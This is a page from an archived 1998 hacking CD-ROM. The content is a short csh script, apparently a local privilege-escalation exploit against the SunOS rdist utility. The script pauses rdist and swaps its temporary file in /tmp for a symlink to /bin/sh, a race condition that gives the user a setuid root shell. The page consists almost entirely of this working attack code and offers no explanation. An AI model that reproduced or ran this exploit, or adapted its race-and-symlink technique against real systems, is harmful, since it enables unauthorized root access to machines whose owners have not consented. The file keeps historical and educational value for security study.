home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
The Hacker's Encyclopedia 1998
/
hackers_encyclopedia.iso
/
hacking
/
unix
/
sun_r001.txt
< prev
next >
Encoding:
Amiga
Atari
Commodore
DOS
FM Towns/JPY
Macintosh
Macintosh JP
NeXTSTEP
RISC OS/Acorn
Shift JIS
UTF-8
Wrap
Text File
|
2003-06-11
|
278 b
|
19 lines
#!/bin/csh
cat << _EOF_ > distfile
testfile -> localhost
install /tmp/werdfile;
_EOF_
cp /vmunix testfile
chmod 4755 testfile
rdist &
PID=$!
kill -STOP ${PID}
(
cd /tmp
ls rdist* > rd1
rm `cat rd1`
ln -s /bin/sh `cat rd1`
rm -f rd1
)
%rdist